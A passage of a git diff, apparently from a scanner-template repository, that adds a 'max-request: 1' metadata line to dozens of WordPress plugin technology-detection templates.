a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..a038adac53 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: 